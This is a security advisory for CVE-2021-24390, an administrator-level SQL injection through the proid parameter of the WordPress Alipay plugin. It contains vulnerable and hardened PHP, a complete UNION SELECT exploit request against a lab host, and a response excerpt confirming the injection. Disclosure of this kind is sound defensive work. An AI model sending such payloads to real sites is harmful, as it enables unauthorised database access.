Wp Plugin Alipay

Plugin Details

Plugin Name: wp-plugin : alipay
Affected Version: 3.7.2 (and most probably lower versions, if any)
Vulnerability: SQL Injection
Minimum Level of Access Required: Administrator
CVE Number: CVE-2021-24390
Identified by : Syed Sheeraz Ali
WPScan Reference URL

Disclosure Timeline

Technical Details

Vulnerable File: /includes/tpl.edit_product.php#65

Vulnerable code block and parameter:

Administrator-level SQL injection through the proid GET parameter in /includes/tpl.edit_product.php, line 65. The value of $_GET['proid'] is interpolated straight into the query string with no integer cast and no $wpdb->prepare(), so anything appended to the numeric ID is executed as part of the statement:

65:    "SELECT `meta_key`,`meta_value` FROM {$wpdb->wsaliproductsmeta} WHERE `wsaliproducts_id`={$_GET['proid']};"
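The vulnerable pattern next to a hardened version of the same lookup, as an added example; this is not the plugin's code or its vendor patch. It assumes the WordPress $wpdb global and the $wpdb->wsaliproductsmeta table-name property used on the vulnerable line, and the function names are illustrative.

```php
<?php
// Added example, not the plugin's own code or its vendor patch. Assumes the
// WordPress $wpdb global and the table-name property $wpdb->wsaliproductsmeta
// seen on the vulnerable line; the function names are illustrative.

// Vulnerable pattern, equivalent to tpl.edit_product.php line 65: the raw
// request value is spliced into the statement, so a proid of
//   -5818 UNION ALL SELECT 73,...,user(),...#
// reaches MySQL verbatim and the UNION is executed.
function ws_alipay_product_meta_vulnerable() {
	global $wpdb;
	$sql = "SELECT `meta_key`,`meta_value` FROM {$wpdb->wsaliproductsmeta} WHERE `wsaliproducts_id`={$_GET['proid']};";
	return $wpdb->get_results( $sql, ARRAY_A );
}

// Hardened pattern. The product ID is an integer, so it is validated as one
// before any SQL is built: FILTER_VALIDATE_INT returns false unless the whole
// string (surrounding whitespace aside) is an optional sign plus digits, and
// min_range additionally rejects 0 and negative IDs. The validated integer is
// then bound with %d through $wpdb->prepare(), so the statement's structure
// can no longer be influenced by the request.
function ws_alipay_product_meta_fixed() {
	global $wpdb;

	// The page is admin-only; keep an explicit capability check rather than
	// relying on the menu registration alone.
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_die( 'Insufficient permissions.' );
	}

	$raw   = isset( $_GET['proid'] ) ? wp_unslash( $_GET['proid'] ) : '';
	$proid = filter_var( $raw, FILTER_VALIDATE_INT, array( 'options' => array( 'min_range' => 1 ) ) );
	if ( false === $proid ) {
		// "-5818 UNION ALL SELECT ..." stops here: it is not an integer.
		wp_die( 'Invalid product id.' );
	}

	$sql = $wpdb->prepare(
		"SELECT `meta_key`, `meta_value` FROM {$wpdb->wsaliproductsmeta} WHERE `wsaliproducts_id` = %d",
		$proid
	);
	return $wpdb->get_results( $sql, ARRAY_A );
}
```

Casting alone, for example absint( $_GET['proid'] ), would also neutralise the injection, but it silently turns the payload above into a lookup of product 5818 (PHP's integer cast keeps the leading -5818 and absint() drops the sign). Rejecting anything that is not a whole integer is the better choice here because tampering then fails loudly instead of being quietly coerced into a valid request.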

PoC Screenshots

[Three PoC screenshots, not reproduced here]

Exploit

Request, sent with an authenticated administrator session. The negative proid (-5818) matches no existing product, so the only row the page has to render is the one supplied by the UNION; the placeholder values (73) pad the injected SELECT to the column count of the query that populates the edit form, which a UNION requires, and user() is placed in the column that ends up in the form's remaining-quantity field:
GET /wp-admin/options-general.php?page=ws_alipay&action=edit&proid=-5818 UNION ALL SELECT 73,73,73,73,73,user(),73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73# HTTP/1.1
Host: 172.28.128.50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1619997929%7CFjLHzIBKioEBny8ydzQjDZwzzgetHj4CE4LvUGwZ8BP%7C91ade9a8fb9ce5dd9f8590a3713b4002f95f743dbd80ca49f3e18fe1e19092b0; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3Ajym5wvRdroAFcxeeEV79mZSv; wordpress_23bcb0de10e8e61a4aab16fc0e9c3005=admin%7C1619531389%7CfDLpVjSqvWcp84Tu2SXKjCfpbcKft3zcY9lfEhlLjE8%7Cc1f3ab6d2df213f5d04520ef98d98dbf47521a3340f91ea762a7ecc204bc4949; wordpress_logged_in_23bcb0de10e8e61a4aab16fc0e9c3005=admin%7C1619531389%7CfDLpVjSqvWcp84Tu2SXKjCfpbcKft3zcY9lfEhlLjE8%7C10c373d650899a426f0e107a8d04d192f21c6c3b838a87bc590bc99ac51bf144; PHPSESSID=6cadbb1f34b2576f2f7394894314e1a4; googtrans=/en/en; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1619997929%7CFjLHzIBKioEBny8ydzQjDZwzzgetHj4CE4LvUGwZ8BP%7C271630feff089fbeb354c05f2163dcc39875be7fde3fa75d8c58c8f89ee443f4; wp-settings-1=mfold%3Do%26editor%3Dtinymce; wp-settings-time-1=1619825129
Connection: close

Response (excerpt). The edit form is rendered from the UNION row: every field carries the placeholder 73, and the result of user() is reflected into the "Remaining quantity" (num) field as bob@localhost, confirming that arbitrary SQL expressions are evaluated and their output returned to the administrator's browser:

<form action="http://172.28.128.50/wp-admin/options-general.php?page=ws_alipay&action=edit&proid=-5818 UNION ALL SELECT 73,73,73,73,73,user(),73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73" method="post" id="ws_alipay_table_more_form" class="ws_alipay_table_form">
<div style="display:none"><label for="proid">Product ID</label><input name="proid" type="text" value="73"  /></div>
<div><label for="name">Product name</label><input name="name" type="text" value="73"  /></div>
<div><label for="protype">Product type</label><select name="protype"  class="ws_alipay_select_protype"  ><option value="CUSTOM">Physical item</option><option value="VIRTUAL">Virtual item</option><option value="ADP">Ad slot</option><option value="LINK">Link exchange</option></select></div>
<div><label for="price">Product price</label><input name="price" type="text" value="73.00"  /></div>
<div style="display:none"><label for="pricePerDay">Daily price</label><input name="pricePerDay" type="text" value=""  class="ws_alipay_multiPrice" /></div>
<div style="display:none"><label for="pricePerWeek">Weekly price</label><input name="pricePerWeek" type="text" value=""  class="ws_alipay_multiPrice" /></div>
<div style="display:none"><label for="pricePerMonth">Monthly price</label><input name="pricePerMonth" type="text" value=""  class="ws_alipay_multiPrice" /></div>
<div style="display:none"><label for="pricePerQuarter">Quarterly price</label><input name="pricePerQuarter" type="text" value=""  class="ws_alipay_multiPrice" /></div>
<div style="display:none"><label for="pricePerYear">Yearly price</label><input name="pricePerYear" type="text" value=""  class="ws_alipay_multiPrice" /></div>
<div><label for="description">Product description</label><input name="description" type="text" value="73"  /></div>
<div><label for="weight">Net weight (kg)</label><input name="weight" type="text" value="73.00"  /></div>
<div><label for="snum">Quantity sold</label><input name="snum" type="text" value="73"  readonly="readonly" /></div>
<div><label for="num">Remaining quantity</label><input name="num" type="text" value="bob@localhost"  /></div>
<div><label for="images">Product image URL</label><input name="images" type="text" value="73"  /></div>
<div><label for="download">Download link</label><input name="download" type="text" value="73"  /></div>
<div><label for="zipcode">Archive password</label><input name="zipcode" type="text" value=""  /></div>
<div><label for="tags">Product tags (,)</label><input name="tags" type="text" value="73"  /></div>
<div><label for="spfre">Buyer pays shipping</label><select name="spfre"  class="ws_alipay_select_spfre"  ><option value="0">No</option><option value="1">Yes</option></select></div>
<div><label for="freight">Shipping price</label><input name="freight" type="text" value="73.00" class="ws_alipay_select_spfre_rel" /></div>
<div><label for="location">Product location</label><input name="location" type="text" value="73"  /></div>
<div><label for="atime">Date added</label><input name="atime" type="text" value="73"  readonly="readonly" /></div>
<div><label for="btime">Listing start time</label><input name="btime" type="text" value="73"  /></div>
<div><label for="etime">Listing end time</label><input name="etime" type="text" value="73"  /></div>
<div><label for="promote">Enable promotion</label><select name="promote"  class="ws_alipay_select_promote"  ><option value="0">Off</option><option value="1">On</option></select></div>
<div><label for="protime">Enable daily promotion</label><select name="protime"  class="ws_alipay_select_protime ws_alipay_select_promote_rel"  ><option value="0">Off</option><option value="1">On</option></select></div>
<div><label for="probdate">Promotion start date</label><input name="probdate" type="text" value="73"  class="ws_alipay_select_promote_rel ws_alipay_select_promote_rel" /></div>
<div><label for="probtime">Promotion start time</label><input name="probtime" type="text" value="73"  class="ws_alipay_select_protime_rel ws_alipay_select_promote_rel" /></div>
<div><label for="proedate">Promotion end date</label><input name="proedate" type="text" value="73"  class="ws_alipay_select_promote_rel ws_alipay_select_promote_rel" /></div>
<div><label for="proetime">Promotion end time</label><input name="proetime" type="text" value="73"  class="ws_alipay_select_protime_rel ws_alipay_select_promote_rel" /></div>
<div><label for="discountb">Promotion discount</label><select name="discountb"  class="ws_alipay_select_discountb ws_alipay_select_promote_rel"  ><option value="0">Off</option><option value="1">On</option></select></div>
<div><label for="discount">Discount rate</label><input name="discount" type="text" value="73.00"  class="ws_alipay_select_discountb_rel ws_alipay_select_promote_rel" /></div>
<div><label for="tplid">Template</label><input name="tplid" type="text" value="73"  /></div>
<div><label for="autosend">Enable automatic stock list</label><select name="autosend"  class="ws_alipay_select_autosend"  ><option value="0">Off</option><option value="1">On</option></select></div>
<div><label for="autosep">Stock separator</label><input name="autosep" type="text" value="73"  class="ws_alipay_select_autosend_rel" /></div>
<div style="float:none;clear:both;width:100%;">
<label for="autosrc" style="float:left;padding-left:2.5%;width:100%">Virtual item stock&nbsp;&nbsp;&nbsp;&nbsp;(if the stock text has one entry per line, leave 'Stock separator' empty; once a separator is set, the stock file below must be split with that separator)</label>
<textarea name="autosrc" style="float:right;display:block;width:97.5%;min-width:97.5%;max-width:97.5%;min-height:70px;margin-left:2.5%" class="ws_alipay_select_autosend_rel">73</textarea>
</div>
<div><label for="buylink">Product quick link</label><input name="buylink" type="text" value="http://172.28.128.50/wp-content/plugins/alipay/includes/tpl.cart.php?proid=73"  class="ws_alipay_prolink" title="Double-click to open" /></div>
<input type="hidden" id="_wpnonce" name="_wpnonce" value="9385918456" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/options-general.php?page=ws_alipay&amp;action=edit&amp;proid=-5818 UNION ALL SELECT 73,73,73,73,73,user(),73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73#" />

<input type="submit" name="submit" class="button-primary" value="Update"/>

<div class="clear"></div>
</form>